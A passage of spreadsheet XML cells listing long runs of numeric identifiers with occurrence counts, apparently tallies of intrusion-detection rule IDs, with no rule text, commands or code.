1726 (1), 939 (1), 952 (1), 967 (1), 955 (1), 958 (1), 961 (1), 965 (1), 1847 (1), 1111 (1), 1592 (1), 43290 (1), 1481 (1), 1521 (1), 1123 (1), 1183 (1), 1160 (1), 807 (1), 1193 (1), 978 (1), 21161 (1), 1023 (1), 1024 (1), 1487 (1), 2325 (1), 1162 (1), 1134 (1), 904 (1), 907 (1), 905 (1), 1215 (1), 1192 (1), 1155 (1), 1161 (1), 1202 (1), 1030 (1), 1040 (1), 60573 (1), 887 (1), 878 (1), 1038 (1), 1022 (1), 1077 (1), 1078 (1), 1075 (1), 984 (1), 1073 (1), 1127 (1), 844 (1), 1585 (1), 1584 (1), 1582 (1), 1151 (1), 1575 (1), 1583 (1), 1581 (1), 41189 (1), 2148 (1), 2151 (1), 1458 (1), 2137 (1), 2397 (1), 1525 (1), 2215 (1), 2223 (1), 1787 (1), 1724 (1), 1723 (1), 2204 (1), 2205 (1), 2206 (1), 2073 (1), 2225 (1), 2130 (1), 2131 (1), 2214 (1), 2086 (1), 2085 (1), 2219 (1), 2133 (1), 1434 (1), 1433 (1), 1872 (1), 1874 (1), 839 (1), 941 (1), 945 (1), 980 (1), 942 (1), 947 (1), 968 (1), 956 (1), 949 (1), 957 (1), 990 (1), 953 (1), 951 (1), 959 (1), 964 (1), 2447 (1), 1070 (1), 1559 (1), 2395 (1), 2326 (1), 2196 (1), 948 (1), 1851 (1), 1110 (1), 1489 (1), 1571 (1), 818 (1), 1032 (1), 1033 (1), 1034 (1), 1035 (1), 1036 (1), 2142 (1), 2141 (1), 1527 (1), 1526 (1), 902 (1), 1520 (1), 1209 (1), 1770 (1), 1769 (1), 33613 (1), 33612 (1), 1004 (1), 17410 (1), 19 (1), 50924 (1), 50925 (1), 50922 (1), 41817 (1), 2276 (1), 25977 (1), 21516 (1), 20663 (1), 64480 (1), 28912 (1), 31637 (1), 20631 (1), 20632 (1), 2143 (1), 20633 (1), 27230 (1), 28957 (1), 20815 (1), 27688 (1), 43724 (1), 43691 (1), 20656 (1), 1671 (1), 20728 (1), 2363 (1), 1399 (1), 31638 (1), 59332 (1), 1091 (1), 20651 (1), 20826 (1), 44133 (1), 2285 (1), 2140 (1), 31419 (1), 886 (1), 2281 (1), 43392 (1), 18478 (1), 27284 (1), 20732 (1), 2288 (1), 2298 (1), 31568 (1), 24502 (1), 23362 (1), 18 (1), 22064 (1), 43285 (1), 2002677 (1), 2101852 (1), 2001343 (1), 2101256 (1), 2019714 (1), 2014379 (1), 2011031 (1), 2049401 (1), 2001949 (1), 2004592 (1), 2101108 (1), 2020296 (1), 2100952 (1), 2100958 (1), 2100961 (1), 2100965 (1), 2101847 (1), 2101111 (1), 2011141 (1), 2011144 (1), 2011142 (1), 2011143 (1), 2101193 (1), 2101023 (1), 2101487 (1), 2102073 (1), 2102131 (1), 2049402 (1), 2101874 (1), 2100953 (1), 2100951 (1), 2100959 (1), 2101110 (1), 2101489 (1), 2002133 (1), 2016182 (1), 2011696 (1), 2010377 (1), 2009435 (1), 2010095 (1), 2009317 (1), 2009318 (1), 2009397 (1), 2009931 (1), 2009848 (1), 2009321 (1), 2010475 (1), 2009311 (1), 2009313 (1), 2012795 (1), 2009367 (1), 2009757 (1), 2009758 (1), 2009759 (1), 2009755 (1), 2009756 (1), 2009760 (1), 2009754 (1), 2009466 (1), 2009467 (1), 2009468 (1), 2009384 (1), 2009059 (1), 2009060 (1), 2009061 (1), 2009062 (1), 2009877 (1), 2009391 (1), 2009369 (1), 2012369 (1), 2010485 (1), 2009871 (1), 2009872 (1), 2009873 (1), 2009196 (1), 2010099 (1), 2009459 (1), 2009898 (1), 2009166 (1), 2003682 (1), 2003704 (1), 2010260 (1), 2009933 (1), 2012013 (1), 2008826 (1), 2009307 (1), 2009051 (1), 2010354 (1), 2009788 (1), 2003678 (1), 2003679 (1), 2009225 (1), 2010252 (1), 2008833 (1), 2010355 (1), 2009793 (1), 2009163 (1), 2003688 (1), 2003696 (1), 2009892 (1), 2009398 (1), 2003703 (1), 2003729 (1), 2003728 (1), 2003727 (1), 2003726 (1), 2009316 (1), 2009101 (1), 2010197 (1), 2008904 (1), 2008903 (1), 2010276 (1), 2008900 (1), 2008901 (1), 2008902 (1), 2010126 (1), 2003671 (1), 2010466 (1), 2009427 (1), 2002902 (1), 2008871 (1), 2003680 (1), 2003701 (1), 2008879 (1), 2010362 (1), 2009381 (1), 2009386 (1), 2010473 (1), 2009188 (1), 2009903 (1), 2008899 (1), 2003737 (1), 2003517 (1), 2009932 (1), 2011274 (1), 2003732 (1), 2003733 (1), 2003718 (1), 2003700 (1), 2003689 (1), 2009364 (1), 2010124 (1), 2010564 (1), 2010125 (1), 2003331 (1), 2011384 (1), 2011259 (1), 2003672 (1), 2003673 (1), 2003674 (1), 2003675 (1), 2003676 (1), 2009415 (1), 2003660 (1), 2003661 (1), 2003664 (1), 2010484 (1), 2003662 (1), 2009372 (1), 2003663 (1), 2003665 (1), 2003666 (1), 2003667 (1), 2003668 (1), 2003681 (1), 2003694 (1), 2002898 (1), 2009887 (1), 2003705 (1), 2009370 (1), 2009371 (1), 2008964 (1), 2009504 (1), 2009502 (1), 2009723 (1), 2003702 (1), 2009325 (1), 2009326 (1), 2008962 (1), 2009164 (1), 2003720 (1), 2003719 (1), 2003721 (1), 2009123 (1), 2009506 (1), 2009229 (1), 2003741 (1), 2003743 (1), 2003744 (1), 2003745 (1), 2009071 (1), 2019524 (1), 2009333 (1), 2009733 (1), 2003669 (1), 2009656 (1), 2009653 (1), 2009378 (1), 2009717 (1), 2009379 (1), 2014180 (1), 2010254 (1), 2003716 (1), 2017436 (1), 2003692 (1), 2003747 (1), 2003686 (1), 2009190 (1), 2011160 (1), 2056027 (1)</t>
  </si>
  <si>
    <t>50447, 17429, 2009151, 2002, 41742, 7070, 2009714, 41188, 2009885, 12, 1122, 2049400, 2101122, 2002681, 1250, 2003595, 2003099, 1560, 60401, 2002731, 59258, 39348, 2010920, 2565, 2016141, 1402, 2101402, 1301, 1142, 966, 1288, 2101288, 2009362, 1002, 882, 2009361, 2001218, 31377, 2027250, 2017442, 20258, 2152, 38371, 33294, 12610, 2101945, 2002070, 2021390, 1245, 41187, 1147, 42465, 33, 31360, 20654, 2101245, 2002996, 2027265, 42289, 2019526, 1400, 1774, 977, 1998, 987, 31940, 1385, 1043, 2100987, 2012911, 2100977, 2100981, 1044, 56563, 2003670, 918, 1125, 1286, 1244, 2077, 43356, 1213, 2101244, 2017440, 1875, 14, 2228, 928, 25975, 1564, 1500, 1018, 1637, 55647, 2100988, 2010963, 2016184, 2101018, 1129, 20173, 1880, 962, 1826, 974, 1827, 20674, 930, 1141, 937, 1201, 1997, 879, 950, 1542, 944, 943, 1005, 40353, 908, 31362, 2410, 2101129, 2030337, 2009001, 2100937, 2101201, 2009180, 2003715, 1242, 1738, 993, 1848, 1401, 911, 1376, 16431, 49920, 1013, 1019, 979, 1556, 31013, 20731, 1254, 2101242, 2027263, 2027253, 2101738, 2100993, 2101401, 2006609, 2011040, 2004589, 2101013, 2009884, 2003739, 2003333, 2002901, 1071, 1131, 1130, 971, 1029, 1145, 31, 2056, 1172, 24342, 1016, 2076, 1493, 1148, 1166, 1765, 903, 1773, 1828, 1231, 7071, 1667, 43458, 1877, 1212, 940, 1248, 1175, 932, 1214, 946, 851, 50921, 2144, 43289, 1037, 1156, 17387, 1119, 1120, 1816, 1165, 1614, 1871, 954, 1031, 2198, 1557, 1555, 1873, 1522, 1523, 895, 21515, 2393, 50923, 27218, 2295, 27192, 16613, 22097, 2002752, 2002749, 2101071, 2027262, 2018752, 2100971, 2101145, 2010767, 2010766, 2102056, 2101016, 2012913, 2101877, 2009485, 2101156, 2100982, 2101403, 2101332, 2011564, 2009167, 2003740, 2009382, 2002879, 2008897, 2003738, 2003699, 2003677, 2002815, 2010027, 2003731, 2002800, 2100884, 2008922, 2017441, 2003698, 2003717, 2003706, 2003707, 2003708, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2008996, 2009179, 43238, 1668, 1852, 40880, 18742, 913, 914, 912, 985, 853, 8492, 43808, 999, 1486, 857, 1284, 3201, 986, 1256, 509, 1482, 1567, 1568, 1772, 1080, 1128, 1076, 1492, 53017, 1146, 1660, 1528, 1164, 2484, 1551, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1048, 1103, 1586, 1577, 1578, 1579, 931, 2246, 1587, 992, 875, 1829, 906, 8493, 3674, 1517, 2154, 2358, 1224, 1491, 1490, 1611, 1088, 2000, 1157, 15990, 1767, 1834, 61117, 36037, 2347, 2346, 1835, 922, 1659, 910, 1722, 1108, 8490, 915, 935, 59237, 1163, 2060, 1173, 1544, 936, 1230, 1742, 1743, 1540, 2138, 1168, 1407, 805, 1726, 939, 952, 967, 955, 958, 961, 965, 1847, 1111, 1592, 43290, 1481, 1521, 1123, 1183, 1160, 807, 1193, 978, 21161, 1023, 1024, 1487, 2325, 1162, 1134, 904, 907, 905, 1215, 1192, 1155, 1161, 1202, 1030, 1040, 60573, 887, 878, 1038, 1022, 1077, 1078, 1075, 984, 1073, 1127, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 41189, 2148, 2151, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 1723, 2204, 2205, 2206, 2073, 2225, 2130, 2131, 2214, 2086, 2085, 2219, 2133, 1434, 1433, 1872, 1874, 839, 941, 945, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1070, 1559, 2395, 2326, 2196, 948, 1851, 1110, 1489, 1571, 818, 1032, 1033, 1034, 1035, 1036, 2142, 2141, 1527, 1526, 902, 1520, 1209, 1770, 1769, 33613, 33612, 1004, 17410, 19, 50924, 50925, 50922, 41817, 2276, 25977, 21516, 20663, 64480, 28912, 31637, 20631, 20632, 2143, 20633, 27230, 28957, 20815, 27688, 43724, 43691, 20656, 1671, 20728, 2363, 1399, 31638, 59332, 1091, 20651, 20826, 44133, 2285, 2140, 31419, 886, 2281, 43392, 18478, 27284, 20732, 2288, 2298, 31568, 24502, 23362, 18, 22064, 43285, 2002677, 2101852, 2001343, 2101256, 2019714, 2014379, 2011031, 2049401, 2001949, 2004592, 2101108, 2020296, 2100952, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2101193, 2101023, 2101487, 2102073, 2102131, 2049402, 2101874, 2100953, 2100951, 2100959, 2101110, 2101489, 2002133, 2016182, 2011696, 2010377, 2009435, 2010095, 2009317, 2009318, 2009397, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2010485, 2009871, 2009872, 2009873, 2009196, 2010099, 2009459, 2009898, 2009166, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2009788, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2009163, 2003688, 2003696, 2009892, 2009398, 2003703, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2009427, 2002902, 2008871, 2003680, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2003737, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2009370, 2009371, 2008964, 2009504, 2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2019524, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2017436, 2003692, 2003747, 2003686, 2009190, 2011160, 2056027</t>
  </si>
  <si>
    <t>2002 (665), 1122 (150), 1250 (94), 1560 (71), 2565 (39), 1402 (28), 1301 (26), 1142 (26), 966 (26), 1288 (24), 1002 (23), 882 (23), 2152 (14), 1245 (13), 1147 (13), 1400 (10), 1774 (10), 977 (9), 1998 (9), 987 (8), 1385 (8), 1043 (8), 1044 (7), 918 (6), 1125 (6), 1286 (6), 1244 (6), 2077 (6), 1213 (6), 1875 (5), 2228 (5), 928 (5), 1564 (5), 1500 (5), 1018 (5), 1637 (5), 1129 (4), 1880 (4), 962 (4), 1826 (4), 974 (4), 1827 (4), 930 (4), 1141 (4), 937 (4), 1201 (4), 1997 (4), 879 (4), 950 (4), 1542 (4), 944 (4), 943 (4), 1005 (4), 908 (4), 2410 (4), 1242 (3), 1738 (3), 993 (3), 1848 (3), 1401 (3), 911 (3), 1376 (3), 1013 (3), 1019 (3), 979 (3), 1556 (3), 1254 (3), 1071 (2), 1131 (2), 1130 (2), 971 (2), 1029 (2), 1145 (2), 2056 (2), 1172 (2), 1016 (2), 2076 (2), 1493 (2), 1148 (2), 1166 (2), 1765 (2), 903 (2), 1773 (2), 1828 (2), 1231 (2), 1667 (2), 1877 (2), 1212 (2), 940 (2), 1248 (2), 1175 (2), 932 (2), 1214 (2), 946 (2), 851 (2), 2144 (2), 43289 (2), 1037 (2), 1156 (2), 1119 (2), 1120 (2), 1816 (2), 1165 (2), 1614 (2), 1871 (2), 954 (2), 1031 (2), 2198 (2), 1557 (2), 1555 (2), 1873 (2), 1522 (2), 1523 (2), 895 (2), 2393 (2), 2295 (2), 1668 (1), 1852 (1), 913 (1), 914 (1), 912 (1), 985 (1), 853 (1), 999 (1), 1000 (1), 1486 (1), 857 (1), 1284 (1), 3201 (1), 986 (1), 1256 (1), 509 (1), 1482 (1), 1567 (1), 1568 (1), 1772 (1), 1080 (1), 1128 (1), 1076 (1), 1492 (1), 1146 (1), 1660 (1), 1528 (1), 1164 (1), 2484 (1), 1551 (1), 1150 (1), 1576 (1), 1152 (1), 1580 (1), 1153 (1), 1154 (1), 2062 (1), 1048 (1), 1103 (1), 1586 (1), 1577 (1), 1578 (1), 1579 (1), 931 (1), 2246 (1), 1587 (1), 992 (1), 875 (1), 1829 (1), 906 (1), 1517 (1), 2154 (1), 2358 (1), 1224 (1), 1491 (1), 1490 (1), 1611 (1), 1088 (1), 2000 (1), 1157 (1), 1767 (1), 1834 (1), 2347 (1), 2346 (1), 1835 (1), 922 (1), 1659 (1), 910 (1), 1722 (1), 1108 (1), 915 (1), 935 (1), 1163 (1), 2060 (1), 1173 (1), 1544 (1), 936 (1), 1230 (1), 1742 (1), 1743 (1), 1540 (1), 2138 (1), 1168 (1), 1407 (1), 805 (1), 1726 (1), 939 (1), 952 (1), 967 (1), 955 (1), 958 (1), 961 (1), 965 (1), 1847 (1), 1111 (1), 1592 (1), 43290 (1), 1481 (1), 1521 (1), 1123 (1), 1183 (1), 1160 (1), 807 (1), 1193 (1), 978 (1), 1023 (1), 1024 (1), 1487 (1), 2325 (1), 1162 (1), 1134 (1), 904 (1), 907 (1), 905 (1), 1215 (1), 1192 (1), 1155 (1), 1161 (1), 1202 (1), 1030 (1), 1040 (1), 887 (1), 878 (1), 1038 (1), 1022 (1), 1077 (1), 1078 (1), 1075 (1), 984 (1), 1073 (1), 1127 (1), 844 (1), 1585 (1), 1584 (1), 1582 (1), 1151 (1), 1575 (1), 1583 (1), 1581 (1), 2148 (1), 2151 (1), 1458 (1), 2137 (1), 2397 (1), 1525 (1), 2215 (1), 2223 (1), 1787 (1), 1724 (1), 1723 (1), 2204 (1), 2205 (1), 2206 (1), 2073 (1), 2225 (1), 2130 (1), 2131 (1), 2214 (1), 2086 (1), 2085 (1), 2219 (1), 2133 (1), 1434 (1), 1433 (1), 1872 (1), 1874 (1), 839 (1), 941 (1), 945 (1), 980 (1), 942 (1), 947 (1), 968 (1), 956 (1), 949 (1), 957 (1), 990 (1), 953 (1), 951 (1), 959 (1), 964 (1), 2447 (1), 1070 (1), 1559 (1), 2395 (1), 2326 (1), 2196 (1), 948 (1), 1851 (1), 1110 (1), 1489 (1), 1571 (1), 818 (1), 1032 (1), 1033 (1), 1034 (1), 1035 (1), 1036 (1), 2142 (1), 2141 (1), 1527 (1), 1526 (1), 902 (1), 1520 (1), 1209 (1), 1770 (1), 1769 (1), 1004 (1), 2276 (1), 2143 (1), 1671 (1), 2363 (1), 1399 (1), 1091 (1), 2285 (1), 2140 (1), 886 (1), 2281 (1), 2288 (1), 2298 (1), 43285 (1)</t>
  </si>
  <si>
    <t>2002, 1122, 1250, 1560, 2565, 1402, 1301, 1142, 966, 1288, 1002, 882, 2152, 1245, 1147, 1400, 1774, 977, 1998, 987, 1385, 1043, 1044, 918, 1125, 1286, 1244, 2077, 1213, 1875, 2228, 928, 1564, 1500, 1018, 1637, 1129, 1880, 962, 1826, 974, 1827, 930, 1141, 937, 1201, 1997, 879, 950, 1542, 944, 943, 1005, 908, 2410, 1242, 1738, 993, 1848, 1401, 911, 1376, 1013, 1019, 979, 1556, 1254, 1071, 1131, 1130, 971, 1029, 1145, 2056, 1172, 1016, 2076, 1493, 1148, 1166, 1765, 903, 1773, 1828, 1231, 1667, 1877, 1212, 940, 1248, 1175, 932, 1214, 946, 851, 2144, 43289, 1037, 1156, 1119, 1120, 1816, 1165, 1614, 1871, 954, 1031, 2198, 1557, 1555, 1873, 1522, 1523, 895, 2393, 2295, 1668, 1852, 913, 914, 912, 985, 853, 999, 1000, 1486, 857, 1284, 3201, 986, 1256, 509, 1482, 1567, 1568, 1772, 1080, 1128, 1076, 1492, 1146, 1660, 1528, 1164, 2484, 1551, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1048, 1103, 1586, 1577, 1578, 1579, 931, 2246, 1587, 992, 875, 1829, 906, 1517, 2154, 2358, 1224, 1491, 1490, 1611, 1088, 2000, 1157, 1767, 1834, 2347, 2346, 1835, 922, 1659, 910, 1722, 1108, 915, 935, 1163, 2060, 1173, 1544, 936, 1230, 1742, 1743, 1540, 2138, 1168, 1407, 805, 1726, 939, 952, 967, 955, 958, 961, 965, 1847, 1111, 1592, 43290, 1481, 1521, 1123, 1183, 1160, 807, 1193, 978, 1023, 1024, 1487, 2325, 1162, 1134, 904, 907, 905, 1215, 1192, 1155, 1161, 1202, 1030, 1040, 887, 878, 1038, 1022, 1077, 1078, 1075, 984, 1073, 1127, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 2148, 2151, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 1723, 2204, 2205, 2206, 2073, 2225, 2130, 2131, 2214, 2086, 2085, 2219, 2133, 1434, 1433, 1872, 1874, 839, 941, 945, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1070, 1559, 2395, 2326, 2196, 948, 1851, 1110, 1489, 1571, 818, 1032, 1033, 1034, 1035, 1036, 2142, 2141, 1527, 1526, 902, 1520, 1209, 1770, 1769, 1004, 2276, 2143, 1671, 2363, 1399, 1091, 2285, 2140, 886, 2281, 2288, 2298, 43285</t>
  </si>
  <si>
    <t>60401 (70), 25975 (5), 16431 (3), 25977 (1)</t>
  </si>
  <si>
    <t>60401, 25975, 16431, 25977</t>
  </si>
  <si>
    <t>2009714 (265), 2010920 (41), 2101402 (28), 2021390 (14), 2100981 (8), 2101244 (6), 2006446 (5), 2010963 (5), 2016184 (5), 2101018 (5), 2030337 (4), 2100993 (3), 2101401 (3), 2011042 (3), 2002901 (3), 2101071 (2), 2100982 (2), 2101403 (2), 2011564 (2), 2002879 (2), 2008897 (2), 2002677 (1), 2101256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t>
  </si>
  <si>
    <t>2009714, 2010920, 2101402, 2021390, 2100981, 2101244, 2006446, 2010963, 2016184, 2101018, 2030337, 2100993, 2101401, 2011042, 2002901, 2101071, 2100982, 2101403, 2011564, 2002879, 2008897, 2002677, 2101256,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t>
  </si>
  <si>
    <t>2009714 (265), 60401 (70), 2010920 (41), 2101402 (28), 2021390 (14), 2100981 (8), 2101244 (6), 25975 (5), 2006446 (5), 2010963 (5), 2016184 (5), 2101018 (5), 2030337 (4), 16431 (3), 2100993 (3), 2101401 (3), 2011042 (3), 2002901 (3), 2101071 (2), 2100982 (2), 2101403 (2), 2011564 (2), 2002879 (2), 2008897 (2), 25977 (1), 2002677 (1), 2101256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t>
  </si>
  <si>
    <t>2009714, 60401, 2010920, 2101402, 2021390, 2100981, 2101244, 25975, 2006446, 2010963, 2016184, 2101018, 2030337, 16431, 2100993, 2101401, 2011042, 2002901, 2101071, 2100982, 2101403, 2011564, 2002879, 2008897, 25977, 2002677, 2101256,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t>
  </si>
  <si>
    <t>50447 (6280), 2002 (665), 7070 (265), 1250 (94), 60401 (70), 59258 (57), 39348 (45), 1402 (28), 966 (26), 1002 (23), 31377 (18), 20258 (16), 38371 (14), 33294 (14), 12610 (14), 42465 (13), 31360 (13), 20654 (13), 1400 (10), 31940 (8), 56563 (7), 918 (6), 1244 (6), 2228 (5), 25975 (5), 1018 (5), 55647 (5), 20173 (4), 974 (4), 1827 (4), 20674 (4), 31362 (4), 1738 (3), 993 (3), 1401 (3), 1376 (3), 16431 (3), 1019 (3), 979 (3), 31013 (3), 20731 (3), 1254 (3), 1071 (2), 1029 (2), 2056 (2), 1828 (2), 7071 (2), 1667 (2), 43458 (2), 50921 (2), 1522 (2), 50923 (2), 27218 (2), 27192 (2), 16613 (2), 22097 (2), 1668 (1), 18742 (1), 1284 (1), 1256 (1), 509 (1), 1567 (1), 1080 (1), 1492 (1), 1048 (1), 1103 (1), 3674 (1), 2358 (1), 1491 (1), 1490 (1), 1088 (1), 15990 (1), 1834 (1), 61117 (1), 36037 (1), 1835 (1), 922 (1), 935 (1), 59237 (1), 1742 (1), 805 (1), 1193 (1), 978 (1), 21161 (1), 60573 (1), 1434 (1), 1433 (1), 1489 (1), 1571 (1), 2141 (1), 17410 (1), 50924 (1), 50925 (1), 50922 (1), 41817 (1), 25977 (1), 20663 (1), 64480 (1), 28912 (1), 31637 (1), 20632 (1), 2143 (1), 27230 (1), 28957 (1), 27688 (1), 43724 (1), 43691 (1), 20656 (1), 20728 (1), 1399 (1), 31638 (1), 59332 (1), 1091 (1), 20651 (1), 20826 (1), 44133 (1), 31419 (1), 43392 (1), 18478 (1), 27284 (1), 20732 (1), 31568 (1), 24502 (1), 22064 (1)</t>
  </si>
  <si>
    <t>50447, 2002, 7070, 1250, 60401, 59258, 39348, 1402, 966, 1002, 31377, 20258, 38371, 33294, 12610, 42465, 31360, 20654, 1400, 31940, 56563, 918, 1244, 2228, 25975, 1018, 55647, 20173, 974, 1827, 20674, 31362, 1738, 993, 1401, 1376, 16431, 1019, 979, 31013, 20731, 1254, 1071, 1029, 2056, 1828, 7071, 1667, 43458, 50921, 1522, 50923, 27218, 27192, 16613, 22097, 1668, 18742, 1284, 1256, 509, 1567, 1080, 1492, 1048, 1103, 3674, 2358, 1491, 1490, 1088, 15990, 1834, 61117, 36037, 1835, 922, 935, 59237, 1742, 805, 1193, 978, 21161, 60573, 1434, 1433, 1489, 1571, 2141, 17410, 50924, 50925, 50922, 41817, 25977, 20663, 64480, 28912, 31637, 20632, 2143, 27230, 28957, 27688, 43724, 43691, 20656, 20728, 1399, 31638, 59332, 1091, 20651, 20826, 44133, 31419, 43392, 18478, 27284, 20732, 31568, 24502, 22064</t>
  </si>
  <si>
    <t>2009151 (2267), 2009714 (265), 2002681 (102), 2003595 (92), 2002731 (59), 2010920 (41), 2101402 (28), 2001218 (19), 2101945 (14), 2002070 (14), 2021390 (14), 2002996 (13), 2012911 (8), 2100981 (8), 2003670 (7), 2101244 (6), 2100988 (5), 2010963 (5), 2016184 (5), 2101018 (5), 2030337 (4), 2009001 (4), 2009180 (4), 2003715 (4), 2101738 (3), 2100993 (3), 2101401 (3), 2006609 (3), 2011040 (3), 2004589 (3), 2003739 (3), 2003333 (3), 2002901 (3), 2101071 (2), 2102056 (2), 2012913 (2), 2100982 (2), 2101403 (2), 2101332 (2), 2011564 (2), 2009167 (2), 2003740 (2), 2009382 (2), 2002879 (2), 2008897 (2), 2003738 (2), 2003699 (2), 2003677 (2), 2002815 (2), 2010027 (2), 2003731 (2), 2002800 (2), 2008922 (2), 2003698 (2), 2003717 (2), 2003706 (2), 2003707 (2), 2003708 (2), 2003709 (2), 2003711 (2), 2003713 (2), 2003712 (2), 2003710 (2), 2003714 (2), 2003867 (2), 2003693 (2), 2008996 (2), 2009179 (2), 2002677 (1), 2001343 (1), 2101256 (1), 2001949 (1), 2004592 (1), 2020296 (1), 2101193 (1), 2101489 (1), 2016182 (1), 2011696 (1), 2010377 (1), 2009435 (1), 2010095 (1), 2009317 (1), 2009318 (1), 2009397 (1), 2009931 (1), 2009848 (1), 2009321 (1), 2010475 (1), 2009311 (1), 2009313 (1), 2012795 (1), 2009367 (1), 2009757 (1), 2009758 (1), 2009759 (1), 2009755 (1), 2009756 (1), 2009760 (1), 2009754 (1), 2009466 (1), 2009467 (1), 2009468 (1), 2009384 (1), 2009059 (1), 2009060 (1), 2009061 (1), 2009062 (1), 2009877 (1), 2009391 (1), 2009369 (1), 2012369 (1), 2010485 (1), 2009871 (1), 2009872 (1), 2009873 (1), 2009196 (1), 2010099 (1), 2009459 (1), 2009898 (1), 2009166 (1), 2003682 (1), 2003704 (1), 2010260 (1), 2009933 (1), 2012013 (1), 2008826 (1), 2009307 (1), 2009051 (1), 2010354 (1), 2009788 (1), 2003678 (1), 2003679 (1), 2009225 (1), 2010252 (1), 2008833 (1), 2010355 (1), 2009793 (1), 2009163 (1), 2003688 (1), 2003696 (1), 2009892 (1), 2009398 (1), 2003703 (1), 2003729 (1), 2003728 (1), 2003727 (1), 2003726 (1), 2009316 (1), 2009101 (1), 2010197 (1), 2008904 (1), 2008903 (1), 2010276 (1), 2008900 (1), 2008901 (1), 2008902 (1), 2010126 (1), 2003671 (1), 2010466 (1), 2009427 (1), 2002902 (1), 2008871 (1), 2003680 (1), 2003701 (1), 2008879 (1), 2010362 (1), 2009381 (1), 2009386 (1), 2010473 (1), 2009188 (1), 2009903 (1), 2008899 (1), 2003737 (1), 2003517 (1), 2009932 (1), 2011274 (1), 2003732 (1), 2003733 (1), 2003718 (1), 2003700 (1), 2003689 (1), 2009364 (1), 2010124 (1), 2010564 (1), 2010125 (1), 2003331 (1), 2011384 (1), 2011259 (1), 2003672 (1), 2003673 (1), 2003674 (1), 2003675 (1), 2003676 (1), 2009415 (1), 2003660 (1), 2003661 (1), 2003664 (1), 2010484 (1), 2003662 (1), 2009372 (1), 2003663 (1), 2003665 (1), 2003666 (1), 2003667 (1), 2003668 (1), 2003681 (1), 2003694 (1), 2002898 (1), 2009887 (1), 2003705 (1), 2009370 (1), 2009371 (1), 2008964 (1), 2009504 (1), 2009502 (1), 2009723 (1), 2003702 (1), 2009325 (1), 2009326 (1), 2008962 (1), 2009164 (1), 2003720 (1), 2003719 (1), 2003721 (1), 2009123 (1), 2009506 (1), 2009229 (1), 2003741 (1), 2003743 (1), 2003744 (1), 2003745 (1), 2009071 (1), 2019524 (1), 2009333 (1), 2009733 (1), 2003669 (1), 2009656 (1), 2009653 (1), 2009378 (1), 2009717 (1), 2009379 (1), 2014180 (1), 2010254 (1), 2003716 (1), 2003692 (1), 2003747 (1), 2003686 (1), 2009190 (1), 2011160 (1), 2056027 (1)</t>
  </si>
  <si>
    <t>2009151, 2009714, 2002681, 2003595, 2002731, 2010920, 2101402, 2001218, 2101945, 2002070, 2021390, 2002996, 2012911, 2100981, 2003670, 2101244, 2100988, 2010963, 2016184, 2101018, 2030337, 2009001, 2009180, 2003715, 2101738, 2100993, 2101401, 2006609, 2011040, 2004589, 2003739, 2003333, 2002901, 2101071, 2102056, 2012913, 2100982, 2101403, 2101332, 2011564, 2009167, 2003740, 2009382, 2002879, 2008897, 2003738, 2003699, 2003677, 2002815, 2010027, 2003731, 2002800, 2008922, 2003698, 2003717, 2003706, 2003707, 2003708, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2008996, 2009179, 2002677, 2001343, 2101256, 2001949, 2004592, 2020296, 2101193, 2101489, 2016182, 2011696, 2010377, 2009435, 2010095, 2009317, 2009318, 2009397, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2010485, 2009871, 2009872, 2009873, 2009196, 2010099, 2009459, 2009898, 2009166, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2009788, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2009163, 2003688, 2003696, 2009892, 2009398, 2003703, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2009427, 2002902, 2008871, 2003680, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2003737, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2009370, 2009371, 2008964, 2009504, 